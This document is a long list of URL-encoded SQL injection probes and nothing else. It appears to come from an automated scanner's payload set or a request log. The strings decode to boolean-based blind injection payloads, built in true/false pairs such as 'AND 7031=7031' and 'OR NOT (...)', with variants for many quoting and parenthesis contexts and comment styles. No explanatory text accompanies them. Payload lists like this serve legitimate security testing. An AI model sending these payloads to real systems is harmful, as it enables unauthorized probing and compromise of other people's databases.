1%20%2B%20%28SELECT%202224%20WHERE%208352%3D8352%20AND%201646%3D5093%20%29 1%27%20%2B%20%28SELECT%20%27VaQW%27%20FROM%20DUAL%20WHERE%206398%3D6398%20AND%204358%3D3107%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27uJmR%27%20FROM%20DUAL%20WHERE%204434%3D4434%20AND%207514%3D7514%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27VgFj%27%20FROM%20DUAL%20WHERE%206360%3D6360%20AND%203692%3D6455%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27mGQZ%27%20WHERE%207370%3D7370%20AND%206448%3D2984%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27RHcC%27%20WHERE%207135%3D7135%20AND%207514%3D7514%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27jYxD%27%20WHERE%201673%3D1673%20AND%201640%3D2795%20%29%20%2B%20%27 1%27%20IN%20BOOLEAN%20MODE%29%20AND%204465%3D6022%20%23 1%27%20IN%20BOOLEAN%20MODE%29%20AND%207514%3D7514%20%23 1%27%20IN%20BOOLEAN%20MODE%29%20AND%201038%3D3819%20%23 1%29%20AND%203533%3D5254%23 1%29%20AND%207031%3D7031%23 1%29%20AND%207595%3D8251%23 1%27%29%20AND%207589%3D6803%23 1%27%29%20AND%207031%3D7031%23 1%27%29%20AND%206099%3D2790%23 1%27%20AND%202677%3D1413%23 1%27%20AND%207031%3D7031%23 1%27%20AND%207586%3D1298%23 1%22%20AND%201323%3D9480%23 1%22%20AND%207031%3D7031%23 1%22%20AND%201905%3D8046%23 1%29%20AND%201464%3D2991%23%20AND%20%281680%3D1680 1%29%20AND%207031%3D7031%23%20AND%20%288664%3D8664 1%29%20AND%205187%3D2709%23%20AND%20%281555%3D1555 1%29%29%20AND%209593%3D5561%23%20AND%20%28%282348%3D2348 1%29%29%20AND%207031%3D7031%23%20AND%20%28%289305%3D9305 1%29%29%20AND%206795%3D4634%23%20AND%20%28%286052%3D6052 1%29%29%29%20AND%207294%3D1469%23%20AND%20%28%28%284215%3D4215 1%29%29%29%20AND%207031%3D7031%23%20AND%20%28%28%287397%3D7397 1%29%29%29%20AND%207469%3D7416%23%20AND%20%28%28%285101%3D5101 1%20AND%202556%3D8113%23 1%20AND%207031%3D7031%23 1%20AND%201530%3D4944%23 1%27%29%20AND%209352%3D8437%23%20AND%20%28%27ADEQ%27%3D%27ADEQ 1%27%29%20AND%207031%3D7031%23%20AND%20%28%27VvXV%27%3D%27VvXV 1%27%29%20AND%205451%3D6257%23%20AND%20%28%27hPcp%27%3D%27hPcp 1%27%29%29%20AND%207407%3D1379%23%20AND%20%28%28%27AucP%27%3D%27AucP 1%27%29%29%20AND%207031%3D7031%23%20AND%20%28%28%27pESK%27%3D%27pESK 1%27%29%29%20AND%205072%3D7319%23%20AND%20%28%28%27IiMO%27%3D%27IiMO 1%27%29%29%29%20AND%202309%3D5749%23%20AND%20%28%28%28%27UGJP%27%3D%27UGJP 1%27%29%29%29%20AND%207031%3D7031%23%20AND%20%28%28%28%27beOF%27%3D%27beOF 1%27%29%29%29%20AND%209029%3D4216%23%20AND%20%28%28%28%27aMHC%27%3D%27aMHC 1%27%20AND%204550%3D4900%23%20AND%20%27wgCU%27%3D%27wgCU 1%27%20AND%207031%3D7031%23%20AND%20%27SzZz%27%3D%27SzZz 1%27%20AND%203306%3D8816%23%20AND%20%27muxN%27%3D%27muxN 1%27%29%20AND%207206%3D8544%23%20AND%20%28%27lEuD%27%20LIKE%20%27lEuD 1%27%29%20AND%207031%3D7031%23%20AND%20%28%27kkyg%27%20LIKE%20%27kkyg 1%27%29%20AND%206977%3D3787%23%20AND%20%28%27kjWL%27%20LIKE%20%27kjWL 1%27%29%29%20AND%208140%3D7734%23%20AND%20%28%28%27bMgX%27%20LIKE%20%27bMgX 1%27%29%29%20AND%207031%3D7031%23%20AND%20%28%28%27rTul%27%20LIKE%20%27rTul 1%27%29%29%20AND%208478%3D3391%23%20AND%20%28%28%27alWL%27%20LIKE%20%27alWL 1%27%29%29%29%20AND%201160%3D6751%23%20AND%20%28%28%28%27PEhk%27%20LIKE%20%27PEhk 1%27%29%29%29%20AND%207031%3D7031%23%20AND%20%28%28%28%27BaAF%27%20LIKE%20%27BaAF 1%27%29%29%29%20AND%205387%3D2791%23%20AND%20%28%28%28%27OAfI%27%20LIKE%20%27OAfI 1%27%20AND%202115%3D2941%23%20AND%20%27vZNj%27%20LIKE%20%27vZNj 1%27%20AND%207031%3D7031%23%20AND%20%27BLBW%27%20LIKE%20%27BLBW 1%27%20AND%209598%3D5426%23%20AND%20%27kqIH%27%20LIKE%20%27kqIH 1%22%29%20AND%209740%3D9173%23%20AND%20%28%22vJhf%22%3D%22vJhf 1%22%29%20AND%207031%3D7031%23%20AND%20%28%22fwOt%22%3D%22fwOt 1%22%29%20AND%202368%3D2280%23%20AND%20%28%22vVpa%22%3D%22vVpa 1%22%29%29%20AND%203301%3D6475%23%20AND%20%28%28%22oWwy%22%3D%22oWwy 1%22%29%29%20AND%207031%3D7031%23%20AND%20%28%28%22yggd%22%3D%22yggd 1%22%29%29%20AND%205159%3D2770%23%20AND%20%28%28%22MZJJ%22%3D%22MZJJ 1%22%29%29%29%20AND%207184%3D1923%23%20AND%20%28%28%28%22saqo%22%3D%22saqo 1%22%29%29%29%20AND%207031%3D7031%23%20AND%20%28%28%28%22jNWz%22%3D%22jNWz 1%22%29%29%29%20AND%209915%3D4220%23%20AND%20%28%28%28%22ZBbU%22%3D%22ZBbU 1%22%20AND%208278%3D4231%23%20AND%20%22evDj%22%3D%22evDj 1%22%20AND%207031%3D7031%23%20AND%20%22SFzZ%22%3D%22SFzZ 1%22%20AND%203168%3D7915%23%20AND%20%22QfOX%22%3D%22QfOX 1%22%29%20AND%206457%3D8856%23%20AND%20%28%22YbyH%22%20LIKE%20%22YbyH 1%22%29%20AND%207031%3D7031%23%20AND%20%28%22uOhx%22%20LIKE%20%22uOhx 1%22%29%20AND%207381%3D9319%23%20AND%20%28%22qypy%22%20LIKE%20%22qypy 1%22%29%29%20AND%209036%3D4635%23%20AND%20%28%28%22nrwX%22%20LIKE%20%22nrwX 1%22%29%29%20AND%207031%3D7031%23%20AND%20%28%28%22FhIE%22%20LIKE%20%22FhIE 1%22%29%29%20AND%208848%3D8735%23%20AND%20%28%28%22KYGo%22%20LIKE%20%22KYGo 1%22%29%29%29%20AND%203239%3D2903%23%20AND%20%28%28%28%22fMuQ%22%20LIKE%20%22fMuQ 1%22%29%29%29%20AND%207031%3D7031%23%20AND%20%28%28%28%22VTlO%22%20LIKE%20%22VTlO 1%22%29%29%29%20AND%201804%3D1799%23%20AND%20%28%28%28%22AwjC%22%20LIKE%20%22AwjC 1%22%20AND%205918%3D7120%23%20AND%20%22efcd%22%20LIKE%20%22efcd 1%22%20AND%207031%3D7031%23%20AND%20%22EETN%22%20LIKE%20%22EETN 1%22%20AND%206156%3D3076%23%20AND%20%22xjVw%22%20LIKE%20%22xjVw 1%29%20WHERE%209627%3D9627%20AND%203398%3D5296%23 1%29%20WHERE%208176%3D8176%20AND%207031%3D7031%23 1%29%20WHERE%203274%3D3274%20AND%208243%3D6317%23 1%27%29%20WHERE%202172%3D2172%20AND%206685%3D7524%23 1%27%29%20WHERE%201840%3D1840%20AND%207031%3D7031%23 1%27%29%20WHERE%202545%3D2545%20AND%207889%3D7237%23 1%27%20WHERE%202450%3D2450%20AND%207630%3D6297%23 1%27%20WHERE%209951%3D9951%20AND%207031%3D7031%23 1%27%20WHERE%202176%3D2176%20AND%202369%3D6976%23 1%22%20WHERE%209724%3D9724%20AND%201330%3D5782%23 1%22%20WHERE%203686%3D3686%20AND%207031%3D7031%23 1%22%20WHERE%202521%3D2521%20AND%204037%3D8341%23 1%27%20%7C%7C%20%28SELECT%203841%20FROM%20DUAL%20WHERE%203626%3D3626%20AND%201139%3D3458%23%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%203936%20FROM%20DUAL%20WHERE%204726%3D4726%20AND%207031%3D7031%23%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%205672%20FROM%20DUAL%20WHERE%205073%3D5073%20AND%206067%3D3231%23%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%209299%20WHERE%208988%3D8988%20AND%205614%3D5978%23%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%201644%20WHERE%205486%3D5486%20AND%207031%3D7031%23%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%203978%20WHERE%204370%3D4370%20AND%208184%3D7401%23%20%29%20%7C%7C%20%27 1%20%2B%20%28SELECT%206744%20FROM%20DUAL%20WHERE%203176%3D3176%20AND%203761%3D5879%23%20%29 1%20%2B%20%28SELECT%209915%20FROM%20DUAL%20WHERE%209582%3D9582%20AND%207031%3D7031%23%20%29 1%20%2B%20%28SELECT%201446%20FROM%20DUAL%20WHERE%208101%3D8101%20AND%204389%3D2502%23%20%29 1%20%2B%20%28SELECT%207531%20WHERE%206494%3D6494%20AND%204338%3D1622%23%20%29 1%20%2B%20%28SELECT%203325%20WHERE%204865%3D4865%20AND%207031%3D7031%23%20%29 1%20%2B%20%28SELECT%206306%20WHERE%209529%3D9529%20AND%206096%3D4451%23%20%29 1%27%20%2B%20%28SELECT%20%27YANd%27%20FROM%20DUAL%20WHERE%209545%3D9545%20AND%206624%3D3165%23%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27phPs%27%20FROM%20DUAL%20WHERE%209562%3D9562%20AND%207031%3D7031%23%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27cQuE%27%20FROM%20DUAL%20WHERE%207914%3D7914%20AND%204822%3D2867%23%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27MjVB%27%20WHERE%202453%3D2453%20AND%207295%3D2983%23%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27DgfA%27%20WHERE%206647%3D6647%20AND%207031%3D7031%23%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27RAUs%27%20WHERE%208022%3D8022%20AND%203463%3D5410%23%20%29%20%2B%20%27 1%27%20IN%20BOOLEAN%20MODE%29%20AND%209500%3D4424%23%20%23 1%27%20IN%20BOOLEAN%20MODE%29%20AND%207031%3D7031%23%20%23 1%27%20IN%20BOOLEAN%20MODE%29%20AND%201531%3D5175%23%20%23 1%29%20AND%201990%3D1202--%20 1%29%20AND%206415%3D6415--%20 1%29%20AND%208413%3D8245--%20 1%27%29%20AND%206497%3D4378--%20 1%27%29%20AND%206415%3D6415--%20 1%27%29%20AND%209593%3D6209--%20 1%27%20AND%202475%3D4372--%20 1%27%20AND%206415%3D6415--%20 1%27%20AND%205604%3D9165--%20 1%22%20AND%208155%3D8698--%20 1%22%20AND%206415%3D6415--%20 1%22%20AND%209698%3D7813--%20 1%29%20AND%206341%3D9265--%20%20AND%20%283393%3D3393 1%29%20AND%206415%3D6415--%20%20AND%20%283930%3D3930 1%29%20AND%205372%3D9559--%20%20AND%20%282688%3D2688 1%29%29%20AND%207003%3D6846--%20%20AND%20%28%289034%3D9034 1%29%29%20AND%206415%3D6415--%20%20AND%20%28%283502%3D3502 1%29%29%20AND%208696%3D4428--%20%20AND%20%28%286364%3D6364 1%29%29%29%20AND%209188%3D6845--%20%20AND%20%28%28%288474%3D8474 1%29%29%29%20AND%206415%3D6415--%20%20AND%20%28%28%288746%3D8746 1%29%29%29%20AND%208013%3D3050--%20%20AND%20%28%28%286533%3D6533 1%20AND%205775%3D6682--%20 1%20AND%206415%3D6415--%20 1%20AND%205915%3D6357--%20 1%27%29%20AND%201530%3D4600--%20%20AND%20%28%27AoKf%27%3D%27AoKf 1%27%29%20AND%206415%3D6415--%20%20AND%20%28%27NoQL%27%3D%27NoQL 1%27%29%20AND%203741%3D1297--%20%20AND%20%28%27lqgw%27%3D%27lqgw 1%27%29%29%20AND%204549%3D7890--%20%20AND%20%28%28%27SGLt%27%3D%27SGLt 1%27%29%29%20AND%206415%3D6415--%20%20AND%20%28%28%27ChWV%27%3D%27ChWV 1%27%29%29%20AND%206696%3D5941--%20%20AND%20%28%28%27aiNP%27%3D%27aiNP 1%27%29%29%29%20AND%207187%3D8451--%20%20AND%20%28%28%28%27gCYP%27%3D%27gCYP 1%27%29%29%29%20AND%206415%3D6415--%20%20AND%20%28%28%28%27QCKF%27%3D%27QCKF 1%27%29%29%29%20AND%209643%3D3642--%20%20AND%20%28%28%28%27vCNn%27%3D%27vCNn 1%27%20AND%206689%3D1658--%20%20AND%20%27vkPB%27%3D%27vkPB 1%27%20AND%206415%3D6415--%20%20AND%20%27HBvg%27%3D%27HBvg 1%27%20AND%208228%3D9846--%20%20AND%20%27eTmt%27%3D%27eTmt 1%27%29%20AND%202824%3D3855--%20%20AND%20%28%27HEHP%27%20LIKE%20%27HEHP 1%27%29%20AND%206415%3D6415--%20%20AND%20%28%27zGyO%27%20LIKE%20%27zGyO 1%27%29%20AND%205742%3D9208--%20%20AND%20%28%27bDhk%27%20LIKE%20%27bDhk 1%27%29%29%20AND%205781%3D3608--%20%20AND%20%28%28%27phis%27%20LIKE%20%27phis 1%27%29%29%20AND%206415%3D6415--%20%20AND%20%28%28%27Juvf%27%20LIKE%20%27Juvf 1%27%29%29%20AND%205536%3D3665--%20%20AND%20%28%28%27lMLZ%27%20LIKE%20%27lMLZ 1%27%29%29%29%20AND%205223%3D1501--%20%20AND%20%28%28%28%27KnQS%27%20LIKE%20%27KnQS 1%27%29%29%29%20AND%206415%3D6415--%20%20AND%20%28%28%28%27OJrN%27%20LIKE%20%27OJrN 1%27%29%29%29%20AND%201602%3D3514--%20%20AND%20%28%28%28%27drHY%27%20LIKE%20%27drHY 1%27%20AND%206650%3D4899--%20%20AND%20%27ORWk%27%20LIKE%20%27ORWk 1%27%20AND%206415%3D6415--%20%20AND%20%27WKoN%27%20LIKE%20%27WKoN 1%27%20AND%203437%3D1814--%20%20AND%20%27yHQt%27%20LIKE%20%27yHQt 1%22%29%20AND%203318%3D9553--%20%20AND%20%28%22GvIu%22%3D%22GvIu 1%22%29%20AND%206415%3D6415--%20%20AND%20%28%22DXqW%22%3D%22DXqW 1%22%29%20AND%209229%3D9058--%20%20AND%20%28%22Ztlu%22%3D%22Ztlu 1%22%29%29%20AND%208644%3D5108--%20%20AND%20%28%28%22rYlL%22%3D%22rYlL 1%22%29%29%20AND%206415%3D6415--%20%20AND%20%28%28%22Cgbn%22%3D%22Cgbn 1%22%29%29%20AND%205720%3D1332--%20%20AND%20%28%28%22fKKw%22%3D%22fKKw 1%22%29%29%29%20AND%203934%3D6285--%20%20AND%20%28%28%28%22vjJP%22%3D%22vjJP 1%22%29%29%29%20AND%206415%3D6415--%20%20AND%20%28%28%28%22PNdO%22%3D%22PNdO 1%22%29%29%29%20AND%208952%3D4866--%20%20AND%20%28%28%28%22jjcy%22%3D%22jjcy 1%22%20AND%204256%3D7027--%20%20AND%20%22QILJ%22%3D%22QILJ 1%22%20AND%206415%3D6415--%20%20AND%20%22OyVn%22%3D%22OyVn 1%22%20AND%205775%3D5301--%20%20AND%20%22SqjZ%22%3D%22SqjZ 1%22%29%20AND%209295%3D3225--%20%20AND%20%28%22cxHf%22%20LIKE%20%22cxHf 1%22%29%20AND%206415%3D6415--%20%20AND%20%28%22PPEy%22%20LIKE%20%22PPEy 1%22%29%20AND%209621%3D7530--%20%20AND%20%28%22iwwf%22%20LIKE%20%22iwwf 1%22%29%29%20AND%209187%3D6334--%20%20AND%20%28%28%22WxIO%22%20LIKE%20%22WxIO 1%22%29%29%20AND%206415%3D6415--%20%20AND%20%28%28%22oGLC%22%20LIKE%20%22oGLC 1%22%29%29%20AND%204973%3D6453--%20%20AND%20%28%28%22QLlu%22%20LIKE%20%22QLlu 1%22%29%29%29%20AND%205439%3D2889--%20%20AND%20%28%28%28%22xxnB%22%20LIKE%20%22xxnB 1%22%29%29%29%20AND%206415%3D6415--%20%20AND%20%28%28%28%22fJWq%22%20LIKE%20%22fJWq 1%22%29%29%29%20AND%209174%3D9791--%20%20AND%20%28%28%28%22cfxa%22%20LIKE%20%22cfxa 1%22%20AND%204034%3D7903--%20%20AND%20%22OGDZ%22%20LIKE%20%22OGDZ 1%22%20AND%206415%3D6415--%20%20AND%20%22aYzp%22%20LIKE%20%22aYzp 1%22%20AND%204487%3D8231--%20%20AND%20%22RCAg%22%20LIKE%20%22RCAg 1%29%20WHERE%209656%3D9656%20AND%201613%3D7169--%20 1%29%20WHERE%203536%3D3536%20AND%206415%3D6415--%20 1%29%20WHERE%203410%3D3410%20AND%205558%3D7619--%20 1%27%29%20WHERE%205580%3D5580%20AND%208941%3D8078--%20 1%27%29%20WHERE%201476%3D1476%20AND%206415%3D6415--%20 1%27%29%20WHERE%205064%3D5064%20AND%201643%3D5449--%20 1%27%20WHERE%205002%3D5002%20AND%202894%3D2517--%20 1%27%20WHERE%209988%3D9988%20AND%206415%3D6415--%20 1%27%20WHERE%205700%3D5700%20AND%207359%3D7498--%20 1%22%20WHERE%202198%3D2198%20AND%204064%3D5131--%20 1%22%20WHERE%208925%3D8925%20AND%206415%3D6415--%20 1%22%20WHERE%203213%3D3213%20AND%209537%3D7884--%20 1%27%20%7C%7C%20%28SELECT%202213%20FROM%20DUAL%20WHERE%209710%3D9710%20AND%203172%3D5955--%20%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%206206%20FROM%20DUAL%20WHERE%202802%3D2802%20AND%206415%3D6415--%20%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%203386%20FROM%20DUAL%20WHERE%207637%3D7637%20AND%208967%3D3991--%20%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%202104%20WHERE%206055%3D6055%20AND%202555%3D4036--%20%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%204407%20WHERE%203558%3D3558%20AND%206415%3D6415--%20%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%206210%20WHERE%206892%3D6892%20AND%209614%3D6760--%20%20%29%20%7C%7C%20%27 1%20%2B%20%28SELECT%203691%20FROM%20DUAL%20WHERE%206409%3D6409%20AND%208999%3D5433--%20%20%29 1%20%2B%20%28SELECT%205353%20FROM%20DUAL%20WHERE%203932%3D3932%20AND%206415%3D6415--%20%20%29 1%20%2B%20%28SELECT%209523%20FROM%20DUAL%20WHERE%209229%3D9229%20AND%207371%3D3000--%20%20%29 1%20%2B%20%28SELECT%203101%20WHERE%202716%3D2716%20AND%205736%3D2573--%20%20%29 1%20%2B%20%28SELECT%201218%20WHERE%201739%3D1739%20AND%206415%3D6415--%20%20%29 1%20%2B%20%28SELECT%209091%20WHERE%201685%3D1685%20AND%202928%3D4855--%20%20%29 1%27%20%2B%20%28SELECT%20%27OWuY%27%20FROM%20DUAL%20WHERE%208057%3D8057%20AND%204848%3D3576--%20%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27PynC%27%20FROM%20DUAL%20WHERE%203691%3D3691%20AND%206415%3D6415--%20%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27UOzG%27%20FROM%20DUAL%20WHERE%209056%3D9056%20AND%209575%3D2364--%20%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27uIpR%27%20WHERE%205046%3D5046%20AND%205639%3D8657--%20%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27aJrs%27%20WHERE%206014%3D6014%20AND%206415%3D6415--%20%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27ptad%27%20WHERE%203452%3D3452%20AND%203973%3D6402--%20%20%29%20%2B%20%27 1%27%20IN%20BOOLEAN%20MODE%29%20AND%205887%3D3923--%20%20%23 1%27%20IN%20BOOLEAN%20MODE%29%20AND%206415%3D6415--%20%20%23 1%27%20IN%20BOOLEAN%20MODE%29%20AND%205340%3D4697--%20%20%23 -2142%29%20OR%20NOT%20%281650%3D5446%29 -3980%29%20OR%20NOT%20%288993%3D8993%29 -4145%29%20OR%20NOT%20%284420%3D8120%29 -1798%27%29%20OR%20NOT%20%283611%3D9907%29 -8736%27%29%20OR%20NOT%20%288993%3D8993%29 -8005%27%29%20OR%20NOT%20%283287%3D5289%29 -2218%27%20OR%20NOT%20%288326%3D5024%29 -7604%27%20OR%20NOT%20%288993%3D8993%29 -7688%27%20OR%20NOT%20%289883%3D3385%29 -6810%22%20OR%20NOT%20%287688%3D3598%29 -9984%22%20OR%20NOT%20%288993%3D8993%29 -9588%22%20OR%20NOT%20%284943%3D2067%29 -7257%29%20OR%20NOT%20%288631%3D6990%29%20AND%20%284974%3D4974 -5076%29%20OR%20NOT%20%288993%3D8993%29%20AND%20%283350%3D3350 -4012%29%20OR%20NOT%20%288828%3D6000%29%20AND%20%286941%3D6941 -6189%29%29%20OR%20NOT%20%284217%3D3895%29%20AND%20%28%287728%3D7728 -5874%29%29%20OR%20NOT%20%288993%3D8993%29%20AND%20%28%287278%3D7278 -8348%29%29%20OR%20NOT%20%282472%3D4168%29%20AND%20%28%281361%3D1361 -4289%29%29%29%20OR%20NOT%20%284180%3D7658%29%20AND%20%28%28%286791%3D6791 -7487%29%29%29%20OR%20NOT%20%288993%3D8993%29%20AND%20%28%28%283263%3D3263 -2590%29%29%29%20OR%20NOT%20%288750%3D4883%29%20AND%20%28%28%281057%3D1057 -5848%20OR%20NOT%20%288060%3D1262%29 -6456%20OR%20NOT%20%288993%3D8993%29 -2430%20OR%20NOT%20%288576%3D1566%29 -3787%27%29%20OR%20NOT%20%285719%3D2243%29%20AND%20%28%27XMat%27%3D%27XMat -6982%27%29%20OR%20NOT%20%288993%3D8993%29%20AND%20%28%27yePe%27%3D%27yePe -3955%27%29%20OR%20NOT%20%282104%3D5903%29%20AND%20%28%27qRlO%27%3D%27qRlO -1990%27%29%29%20OR%20NOT%20%286362%3D4510%29%20AND%20%28%28%27FmlR%27%3D%27FmlR -2813%27%29%29%20OR%20NOT%20%288993%3D8993%29%20AND%20%28%28%27sAzE%27%3D%27sAzE -3277%27%29%29%20OR%20NOT%20%288983%3D4437%29%20AND%20%28%28%27Itns%27%3D%27Itns -8058%27%29%29%29%20OR%20NOT%20%283949%3D9763%29%20AND%20%28%28%28%27hBoV%27%3D%27hBoV -6038%27%29%29%29%20OR%20NOT%20%288993%3D8993%29%20AND%20%28%28%28%27oSoo%27%3D%27oSoo -7289%27%29%29%29%20OR%20NOT%20%282350%3D1397%29%20AND%20%28%28%28%27NhBf%27%3D%27NhBf -3816%27%20OR%20NOT%20%286612%3D7404%29%20AND%20%27QoXQ%27%3D%27QoXQ -7739%27%20OR%20NOT%20%288993%3D8993%29%20AND%20%27FfhM%27%3D%27FfhM -1218%27%20OR%20NOT%20%286523%3D4535%29%20AND%20%27OnME%27%3D%27OnME -4935%27%29%20OR%20NOT%20%289601%3D7130%29%20AND%20%28%27nXVQ%27%20LIKE%20%27nXVQ -4255%27%29%20OR%20NOT%20%288993%3D8993%29%20AND%20%28%27FRYM%27%20LIKE%20%27FRYM -8337%27%29%20OR%20NOT%20%288325%3D2243%29%20AND%20%28%27kIPT%27%20LIKE%20%27kIPT -9543%27%29%29%20OR%20NOT%20%288384%3D2972%29%20AND%20%28%28%27yFTM%27%20LIKE%20%27yFTM -8760%27%29%29%20OR%20NOT%20%288993%3D8993%29%20AND%20%28%28%27Nakd%27%20LIKE%20%27Nakd -8715%27%29%29%20OR%20NOT%20%289743%3D6251%29%20AND%20%28%28%27VVzp%27%20LIKE%20%27VVzp -3673%27%29%29%29%20OR%20NOT%20%286989%3D1204%29%20AND%20%28%28%28%27ASMC%27%20LIKE%20%27ASMC -6230%27%29%29%29%20OR%20NOT%20%288993%3D8993%29%20AND%20%28%28%28%27odri%27%20LIKE%20%27odri -5438%27%29%29%29%20OR%20NOT%20%286947%3D2520%29%20AND%20%28%28%28%27EfhH%27%20LIKE%20%27EfhH -4893%27%20OR%20NOT%20%281272%3D1191%29%20AND%20%27kIZg%27%20LIKE%20%27kIZg -7879%27%20OR%20NOT%20%288993%3D8993%29%20AND%20%27masl%27%20LIKE%20%27masl -6119%27%20OR%20NOT%20%284150%3D4813%29%20AND%20%27XApl%27%20LIKE%20%27XApl -7397%22%29%20OR%20NOT%20%286602%3D6877%29%20AND%20%28%22eWSM%22%3D%22eWSM -3805%22%29%20OR%20NOT%20%288993%3D8993%29%20AND%20%28%22VeyH%22%3D%22VeyH -8243%22%29%20OR%20NOT%20%283808%3D8724%29%20AND%20%28%22hhEP%22%3D%22hhEP -6963%22%29%29%20OR%20NOT%20%282187%3D7811%29%20AND%20%28%28%22fEjA%22%3D%22fEjA -4325%22%29%29%20OR%20NOT%20%288993%3D8993%29%20AND%20%28%28%22epLn%22%3D%22epLn -4373%22%29%29%20OR%20NOT%20%289253%3D2417%29%20AND%20%28%28%22iqGC%22%3D%22iqGC -1408%22%29%29%29%20OR%20NOT%20%287766%3D9455%29%20AND%20%28%28%28%22fCvH%22%3D%22fCvH -7402%22%29%29%29%20OR%20NOT%20%288993%3D8993%29%20AND%20%28%28%28%22SkhB%22%3D%22SkhB -4084%22%29%29%29%20OR%20NOT%20%286076%3D9880%29%20AND%20%28%28%28%22SJkZ%22%3D%22SJkZ -5341%22%20OR%20NOT%20%288361%3D1542%29%20AND%20%22rdzL%22%3D%22rdzL -7173%22%20OR%20NOT%20%288993%3D8993%29%20AND%20%22yZAn%22%3D%22yZAn -4880%22%20OR%20NOT%20%282728%3D1324%29%20AND%20%22gIqY%22%3D%22gIqY -2771%22%29%20OR%20NOT%20%282017%3D5665%29%20AND%20%28%22emFj%22%20LIKE%20%22emFj -1480%22%29%20OR%20NOT%20%288993%3D8993%29%20AND%20%28%22jctr%22%20LIKE%20%22jctr -4211%22%29%20OR%20NOT%20%288382%3D9269%29%20AND%20%28%22SEpM%22%20LIKE%20%22SEpM -1088%22%29%29%20OR%20NOT%20%284431%3D7929%29%20AND%20%28%28%22AlxZ%22%20LIKE%20%22AlxZ -6308%22%29%29%20OR%20NOT%20%288993%3D8993%29%20AND%20%28%28%22DMvH%22%20LIKE%20%22DMvH -8569%22%29%29%20OR%20NOT%20%283434%3D5269%29%20AND%20%28%28%22ctPL%22%20LIKE%20%22ctPL -2438%22%29%29%29%20OR%20NOT%20%282218%3D1605%29%20AND%20%28%28%28%22qCFP%22%20LIKE%20%22qCFP -5328%22%29%29%29%20OR%20NOT%20%288993%3D8993%29%20AND%20%28%28%28%22gqpU%22%20LIKE%20%22gqpU -5932%22%29%29%29%20OR%20NOT%20%281749%3D4000%29%20AND%20%28%28%28%22erCL%22%20LIKE%20%22erCL -2573%22%20OR%20NOT%20%286868%3D8794%29%20AND%20%22cCrj%22%20LIKE%20%22cCrj -5419%22%20OR%20NOT%20%288993%3D8993%29%20AND%20%22SoyA%22%20LIKE%20%22SoyA -8763%22%20OR%20NOT%20%283592%3D9661%29%20AND%20%22ZGIn%22%20LIKE%20%22ZGIn -3351%29%20WHERE%204216%3D4216%20OR%20NOT%20%285252%3D8789%29 -8552%29%20WHERE%203948%3D3948%20OR%20NOT%20%288993%3D8993%29 -9278%29%20WHERE%208884%3D8884%20OR%20NOT%20%286506%3D1553%29 -6923%27%29%20WHERE%201216%3D1216%20OR%20NOT%20%286613%3D2214%29 -1982%27%29%20WHERE%208880%3D8880%20OR%20NOT%20%288993%3D8993%29 -7870%27%29%20WHERE%207219%3D7219%20OR%20NOT%20%282103%3D7453%29 -4235%27%20WHERE%206877%3D6877%20OR%20NOT%20%287495%3D8216%29 -6536%27%20WHERE%203956%3D3956%20OR%20NOT%20%288993%3D8993%29 -4235%27%20WHERE%209375%3D9375%20OR%20NOT%20%285929%3D5341%29 -9500%22%20WHERE%206669%3D6669%20OR%20NOT%20%284237%3D6337%29 -7029%22%20WHERE%205394%3D5394%20OR%20NOT%20%288993%3D8993%29 -7333%22%20WHERE%201532%3D1532%20OR%20NOT%20%285635%3D4707%29 -4867%29%20OR%20NOT%20%288564%3D5848%29%23 -2011%29%20OR%20NOT%20%285797%3D5797%29%23 -9924%29%20OR%20NOT%20%287251%3D6830%29%23 -1421%27%29%20OR%20NOT%20%282961%3D6176%29%23 -8421%27%29%20OR%20NOT%20%285797%3D5797%29%23 -4090%27%29%20OR%20NOT%20%289821%3D7866%29%23 -7848%27%20OR%20NOT%20%282659%3D5017%29%23 -7269%27%20OR%20NOT%20%285797%3D5797%29%23 -1248%27%20OR%20NOT%20%288749%3D5563%29%23 -9720%22%20OR%20NOT%20%285389%3D5752%29%23 -4817%22%20OR%20NOT%20%285797%3D5797%29%23 -9065%22%20OR%20NOT%20%286122%3D2520%29%23 -2292%29%20OR%20NOT%20%281247%3D7741%29%23%20AND%20%288554%3D8554 -3039%29%20OR%20NOT%20%285797%3D5797%29%23%20AND%20%286829%3D6829 -5448%29%20OR%20NOT%20%282421%3D8902%29%23%20AND%20%282188%3D2188 -1374%29%29%20OR%20NOT%20%287053%3D6499%29%23%20AND%20%28%281431%3D1431 -4009%29%29%20OR%20NOT%20%285797%3D5797%29%23%20AND%20%28%282561%3D2561 -1575%29%29%20OR%20NOT%20%289392%3D5596%29%23%20AND%20%28%289181%3D9181 -2031%29%29%29%20OR%20NOT%20%288574%3D3286%29%23%20AND%20%28%28%281452%3D1452 -6110%29%29%29%20OR%20NOT%20%285797%3D5797%29%23%20AND%20%28%28%282862%3D2862 -9436%29%29%29%20OR%20NOT%20%281913%3D5119%29%23%20AND%20%28%28%287011%3D7011 -8160%20OR%20NOT%20%284612%3D2231%29%23 -2535%20OR%20NOT%20%285797%3D5797%29%23 -3312%20OR%20NOT%20%287825%3D9709%29%23 